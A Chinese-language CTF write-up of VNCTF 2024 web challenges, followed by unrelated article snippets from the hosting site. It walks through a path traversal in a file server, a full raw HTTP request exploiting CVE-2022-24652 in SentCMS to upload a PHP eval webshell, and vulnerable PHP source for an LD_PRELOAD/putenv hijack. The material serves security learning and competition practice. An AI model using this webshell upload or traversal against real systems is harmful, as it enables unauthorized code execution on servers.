当前位置：首页 > news >正文

VNCTF 2024 Web方向 WP

news 2026/3/27 20:06:18

Checkin

题目描述：Welcome to VNCTF 2024~ long time no see.

开题，是前端小游戏

源码里面发现一个16进制编码字符串

解码后是flag

CutePath

题目描述：源自一次现实渗透

开题

当前页面没啥好看的，先爆破密码登录试试。爆破无果。。。

在项目的github仓库中的issues发现了别人提出的安全性问题（目录穿越）

安全性问题 · Issue #15 · ods-im/CuteHttpFileServer · GitHub

确实可行，发现一个文件名为base64编码的文件。

解码后是账号密码，即可登录。

目录穿越找到flag位置

重命名，用目录穿越，将文件移到可下载目录下。

点开就是flag

TrySent

考点总结：CVE-2022-24652，文件上传漏洞

题目描述：Just TrySent，出错不影响解题。

后台管理是thinkphp的，但是工具没检测出漏洞。

登陆后界面如下，上传头像功能值得引起注意

这其实就是CVE-2022-24652，危险类型文件的不加限制上传，是文件上传漏洞。漏洞路由/user/upload/upload

参考文章：

阿里云漏洞库 (aliyun.com)

CVE-2022-24652|sentcms 4.0.x allows remote… - VULHUB开源网络安全威胁库

Sentcms任意文件上传漏洞 | Hanayuzu’Blog

抓包上传文件，由于没有上传文件按钮，我们手动构建上传包。

修改包：

POST /user/upload/upload HTTP/1.1
Host: 7dd1d89b-bc28-43fc-9b42-a014dff41eea.vnctf2024.manqiu.top
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=bdd5af1e5c92e47342e53886cecaced2
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Length: 770------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="id"WU_FILE_0
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="name"test.jpg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="type"image/jpeg
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="lastModifiedDate"Wed Jul 21 2021 18:15:25 GMT+0800 (中国标准时间)
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="size"164264
------WebKitFormBoundaryrhx2kYAMYDqoTThz
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: image/jpegJay17
<?php eval($_POST[1]);?>------WebKitFormBoundaryrhx2kYAMYDqoTThz--

访问呢恶意文件，getshell

codefever_again【*】

题目描述：非常好代码，爱来自审计，codefever 最新

开题

先注册账号试试

givenphp【*】

考点总结：LD_PRELOAD & putenv()劫持共享so绕过（LD_PRELOAD劫持（ld劫持））

题目描述：非常好题目，爱来自白给

直接给了源码：

<?php
highlight_file(__FILE__);
if(isset($_POST['upload'])){handleFileUpload($_FILES['file']);
}if(isset($_GET['challenge'])){waf();$value=$_GET['value'];$key=$_GET['key'];$func=create_function("","putenv('$key=$value');");if($func==$_GET['guess']){$func();system("whoami");}
}
function waf()
{if(preg_match('/\'|"|%|\(|\)|;|bash/i',$_GET['key'])||preg_match('/\'|"|%|\(|\)|;|bash/i',$_GET['value'])){die("evil input!!!");}
}
function handleFileUpload($file)
{$uploadDirectory = '/tmp/';if ($file['error'] !== UPLOAD_ERR_OK) {echo '文件上传失败。';return;}$fileExtension = pathinfo($file['name'], PATHINFO_EXTENSION);$newFileName = uniqid('uploaded_file_', true) . '.' . $fileExtension;$destination = $uploadDirectory . $newFileName;if (move_uploaded_file($file['tmp_name'], $destination)) {echo $destination;} else {echo '文件移动失败。';}
}

题目有两个功能，一个是文件上传，还有一个是环境变量修改。过滤死了不能直接环境变量注入。

有文件上传有环境变量修改就是LD_PRELOAD劫持（ld劫持）。这个方法用在disable_functions的手动绕过中，也就是LD_PRELOAD & putenv()劫持共享so绕过。

VNCTF 2024 Web方向 WP

Checkin 题目描述：Welcome to VNCTF 2024~ long time no see. 开题，是前端小游戏源码里面发现一个16进制编码字符串解码后是flag CutePath 题目描述：源自一次现实渗透开题当前页面没啥好看的，先爆破密码登录试试。爆破无果…...

编程日记 2024/2/18 15:28:54

第11章 GUI

11.1 Swing概述 Swing是Java语言开发图形化界面的一个工具包。它以抽象窗口工具包（AWT）为基础，使跨平台应用程序可以使用可插拔的外观风格。Swing拥有丰富的库和组件，使用非常灵活，开发人员只用很少的代码就可以创建出…...

编程日记 2024/2/18 15:26:52

综合项目---博客

一.运行环境 192.168.32.132 Server-Web linux Web 192.168.32.133 Server-NFS-DNS linux NFS/DNS 基础配置 1.配置主机名静态ip 2.开启防火墙并配置 3.部分开启selinux并配置 4.服务器之间通过阿里云进行时间同步 5.服务器之间实现ssh免密…...

编程日记 2024/2/18 15:22:44

leetcode（矩阵）74. 搜索二维矩阵（C++详细解释）DAY7

文章目录 1.题目示例提示 2.解答思路3.实现代码结果 4.总结 1.题目给你一个满足下述两条属性的 m x n 整数矩阵： 每行中的整数从左到右按非严格递增顺序排列。每行的第一个整数大于前一行的最后一个整数。给你一个整数 target ，如果 target 在矩阵中…...

编程日记 2024/2/18 15:21:42

超详细||YOLOv8基础教程（环境搭建，训练，测试，部署看一篇就够）（在推理视频中添加FPS信息）

一、YOLOv8环境搭建这篇文章将跳过基础的深度学习环境的搭建，如果没有完成的可以看我的这篇博客：超详细||深度学习环境搭建记录cudaanacondapytorchpycharm-CSDN博客 1. 在github上下载源码： GitHub - ultralytics/ultralytics: NEW - YO…...

编程日记 2024/2/18 15:19:38

LeetCode171. Excel Sheet Column Number

文章目录一、题目二、题解一、题目 Given a string columnTitle that represents the column title as appears in an Excel sheet, return its corresponding column number. For example: A -> 1 B -> 2 C -> 3 … Z -> 26 AA -> 27 AB -> 28 … Exa…...

编程日记 2024/2/18 15:17:34

pycharm创建py文件，自动带# -- coding:utf-8 --

File–Settings...

编程日记 2024/2/18 15:13:27

希捷与索尼集团合作生产HAMR写头激光二极管

最近有报道指出，希捷（Seagate）在生产其采用热辅助磁记录（HAMR）技术的大容量硬盘时，并非所有组件都在内部制造。根据日经新闻的一份新报告，希捷已与索尼集团合作，由索尼为其HAMR写头生…...

编程日记 2024/2/18 15:04:19

电脑竖屏显示了怎么回复原状

电脑屏幕变成这样怎么恢复原状？ 1、登录系统 2、在桌面上空白点击鼠标右键 3、在右键菜单中选择“屏幕分辨率”，左键点击打开 4、在窗口中“方向”位置选择“横向” 5、保存设置win7桌面即可恢复到正常状态...

编程日记 2024/2/18 15:01:16

Elasticsearch从入门到精通

目录 🧂1.简单介绍 🥓2.安装与下载 🌭3.安装启动es 🍿4.安装启动kibana 🥞5.初步检索 🧈6.进阶检索 🫓7.Elasticsearch整合 1.简单介绍🚗🚗🚗 Elat…...

编程日记 2024/2/18 15:00:15

Halcon 相机标定

文章目录算子单相机标定单相机标定畸变的矫正算子 gen_caltab 生成标定文件 gen_caltab(::XNum,YNum,MarkDist,DiameterRatio,CalTabDescrFile,CalTabPSFile :) 算子来制作一个标定板XNum 每行黑色标志圆点的数量。YNum 每列黑色标志圆点的数…...

编程日记 2024/2/18 14:59:14

【JavaScript】深浅拷贝

JavaScript中复制对象有深拷贝和浅拷贝两种方式浅拷贝：浅拷贝只复制对象的第一层属性，而不复制嵌套对象的引用。这意味着如果原始对象包含嵌套对象，浅拷贝后的对象仍然会共享这些嵌套对象的引用。可以使用`Object.assign()`或展开运算符（`...`）来进行浅拷贝。 // 浅拷贝示…...

编程日记 2024/2/18 14:58:13

CH32V3xx RT-Thread RS485实现modbus rtu master

目录 1、串口配置1.1 串口初始化1.2 uart DMA 初始化1.1.3 发送函数2、agile modbus3、应用测试4、遇到的问题本文通过ch32v3xx的串口 + RS485收发器实现modbus rtu master设备。此工程中移植的RT-Thread Nano系统，详情可参看本专栏前几篇文章。 1、串口配置串口使用重映射后…...

编程日记 2024/2/18 14:57:12

当网站遭到DDOS攻击怎么办？

一般网站进行上线后会经常遭到攻击，有一些攻击不怎么容易被发现，当大规模的攻击来临时，会给企业造成巨大的损失，使网站的业务下线并且访问异常，出现很多的问题。其中DDOS攻击是最高频的一种网络攻击方式，那…...

编程日记 2024/2/18 14:55:08

ES6中的数组解构赋值【详解】

文章目录 1.数组的解构赋值1.1 基本用法1.2 默认值1.3更多对象解构赋值 1.数组的解构赋值 1.1 基本用法 ES6允许按照一定的模式，从数组和对象中提取值，对变量进行赋值，这被称为结构。 let [a, b, c] [1, 2, 3];如果解构不成功&#xff0c…...

编程日记 2024/2/18 14:54:07

error An unexpected error occurred: “https://registry.npm.taobao.org

背景： 想使用yarn命令结果报错问题原因： 原来证书到期了 http://registry.npm.taobao.org/ 把这个放到浏览器搜索的时候自动换成https://registry.npmmirror.com/ 方案： npm cache clean --forcenpm config set registry https://registry…...

编程日记 2024/2/18 14:51:04

react中commit工作流程

整个React工作流程可以分为两大阶段： Render阶段 Schecule Reconcile Commit阶段注意，Render阶段是在内存中运行的，这意味者可以被打断，而commit阶段一旦开始同步执行直到完成。 Renderer工作的阶段被称为commit阶段。commit阶…...

编程日记 2024/2/18 14:50:03

C++类和对象-多态-＞多态的基本语法、多态的原理剖析、纯虚函数和抽象类、虚析构和纯虚析构

#include<iostream> using namespace std; //多态 //动物类 class Animal { public: //Speak函数就是虚函数 //函数前面加上virtual关键字，变成虚函数，那么编译器在编译的时候就不能确定函数调用了。 virtual void speak() { …...

编程日记 2024/2/18 14:44:58

QShortcut

一、QShortcut简介 QShortcut是Qt框架中提供的一个类，用于创建和管理键盘快捷键。它允许开发者为应用程序定义一组快捷键组合，当用户按下这些组合键时，可以触发相应的动作或事件。QShortcut的使用使得用户能够更加方便、快捷地操作应用程序&…...

编程日记 2024/2/18 14:42:56

浅谈语义分割、图像分类与目标检测中的TP、TN、FP、FN

语义分割 TP：正确地预测出了正类，即原本是正类，识别的也是正类 TN：正确地预测出了负类，即原本是负类，识别的也是负类 FP：错误地预测为了正类，即原本是负类，识别的是正类…...

编程日记 2024/2/18 14:39:53

从Shadertoy到Cesium：那些GLSL移植时没人告诉你的分辨率陷阱

GLSL跨平台移植中的分辨率适配陷阱与实战解决方案当我们将Shadertoy上令人惊艳的GLSL效果移植到Cesium等三维引擎时，往往会遇到一个看似简单却影响深远的问题——分辨率适配。这个问题不仅关乎视觉效果还原度，更直接影响着色器在不同设备上的表现一致性…...

编程新知 2026/3/27 19:26:53

告别bypy上传失败！用Aria2+百度云直链脚本，让服务器下载速度飙升5倍

告别bypy上传失败！用Aria2百度云直链脚本，让服务器下载速度飙升5倍如果你经常需要将百度网盘中的大文件（比如几十GB的机器学习模型或数据集）传输到服务器上，一定对bypy的种种限制深有体会——速度慢、不稳定、大文件容…...

编程新知 2026/3/27 19:06:49

Docker 容器中文字体及 matplotlib 环境应用

为了避开 Noto CJK 这种复杂的 TTC（TrueType Collection）大包带来的识别问题，最理想的选择是使用独立打包的 OTF 或 TTF 字体。 0. 环境检查 # 1. 更新源并安装 fontconfig apt-get update apt-get install -y fontconfig# 2. 现在 fc-cache 命令可用了，刷新系统字体 fc-…...

编程新知 2026/3/27 17:43:59

Android Gradle - Gradle 自定义插件（Build Script 自定义插件、buildSrc 自定义插件、独立项目自定义插件）

一、Build Script 自定义插件 1、基本介绍插件代码直接写在模块级 build.gradle 文件中逻辑非常简单，且仅在该模块使用2、演示 （1）具体实现在模块级 build.gradle 文件中定义插件 class SimpleBuildScriptPlugin implements Plugin<Proje…...

编程新知 2026/3/27 17:15:55

STM32博物馆环境监控系统设计与实现

基于STM32的博物馆展柜环境监控系统设计1. 项目概述1.1 系统背景文物保护工作中，展柜微环境稳定性直接影响文物保存状态。传统人工巡检方式存在响应滞后、数据不连续等问题。本项目设计了一套基于STM32的智能化环境监控系统，可实时监测温湿度、光照、烟雾…...

编程新知 2026/3/27 15:47:09

模拟地和数字地到底怎么接？从ADC设计误区讲起，用磁珠还是直接铺铜？

数模混合电路设计中的地平面处理：从ADC噪声抑制到系统级EMC优化 1. 数模混合电路的接地困局：当磁珠成为噪声放大器在24位ADC采样电路中，工程师老张遇到了一个诡异现象：当输入信号低于1mV时，采集数据会出现周期性毛刺。…...

编程新知 2026/3/27 14:44:45

GitHub Desktop汉化终极指南：如何让英文界面瞬间变成中文

GitHub Desktop汉化终极指南：如何让英文界面瞬间变成中文【免费下载链接】GitHubDesktop2Chinese GithubDesktop语言本地化(汉化)工具项目地址: https://gitcode.com/gh_mirrors/gi/GitHubDesktop2Chinese 还在为GitHub Desktop的英文界面而头疼吗&#xf…...

编程新知 2026/3/27 13:00:54